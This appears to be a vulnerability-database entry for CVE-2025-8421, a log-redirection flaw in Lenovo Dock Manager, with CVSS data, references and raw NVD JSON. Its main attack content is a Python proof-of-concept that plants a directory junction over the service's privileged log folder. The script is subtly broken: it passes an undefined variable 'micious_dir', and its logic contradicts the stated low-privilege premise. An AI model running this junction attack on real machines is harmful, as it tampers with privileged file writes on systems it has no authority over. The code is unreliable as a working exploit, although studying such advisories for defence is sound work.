CVE-2025-8421

Description

An improper default permission vulnerability was reported in Lenovo Dock Manager that, under certain conditions during installation, could allow an authenticated local user to redirect log files with elevated privileges.

CVSS Details

CVSS Score

6.6

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Lenovo Dock Manager < 1.3.0082

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-8421 PoC - Lenovo Dock Manager Log File Redirection
# This PoC demonstrates the log file redirection vulnerability

import os
import sys
import subprocess
import time

def create_symlink_junction(target_path, link_path):
    """Create a directory junction for log redirection"""
    try:
        if os.path.exists(link_path):
            os.rmdir(link_path)
        # Use mklink /J for directory junction
        subprocess.run(['cmd.exe', '/c', 'mklink', '/J', link_path, target_path], 
                      check=True, capture_output=True)
        print(f"[+] Created junction: {link_path} -> {target_path}")
        return True
    except Exception as e:
        print(f"[-] Failed to create junction: {e}")
        return False

def check_dock_manager_installed():
    """Check if Lenovo Dock Manager is installed"""
    install_paths = [
        r'C:\Program Files\Lenovo\Dock Manager\DockManager.exe',
        r'C:\Program Files (x86)\Lenovo\Dock Manager\DockManager.exe'
    ]
    for path in install_paths:
        if os.path.exists(path):
            return True
    return False

def main():
    print("CVE-2025-8421 - Lenovo Dock Manager Log File Redirection PoC")
    print("=" * 60)
    
    if not check_dock_manager_installed():
        print("[-] Lenovo Dock Manager not found on this system")
        return
    
    # Target paths for log redirection
    target_dir = r'C:\Windows\System32\config\systemprofile\AppData\Local\Lenovo\DockManager\Logs'
    malicious_dir = r'C:\Windows\Temp\malicious_logs'
    
    # Create malicious directory
    os.makedirs(malicious_dir, exist_ok=True)
    
    # Create junction to redirect logs
    if create_symlink_junction(micious_dir, target_dir):
        print("[+] Junction created successfully")
        print(f"[+] Any log files written by Dock Manager will be redirected to: {malicious_dir}")
        print("[+] This could allow writing to privileged locations")
    else:
        print("[-] Exploitation requires administrator privileges for junction creation")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-8421
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-8421
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-8421/
[4] VulDB https://vuldb.com/cve/CVE-2025-8421
[5] https://support.lenovo.com/us/en/product_security/LEN-198729

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-8421", "sourceIdentifier": "[email protected]", "published": "2025-11-12T20:15:45.430", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An improper default permission vulnerability was reported in Lenovo Dock Manager that, under certain conditions during installation, could allow an authenticated local user to redirect log files with elevated privileges."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.3, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-276"}]}], "references": [{"url": "https://support.lenovo.com/us/en/product_security/LEN-198729", "source": "[email protected]"}]}}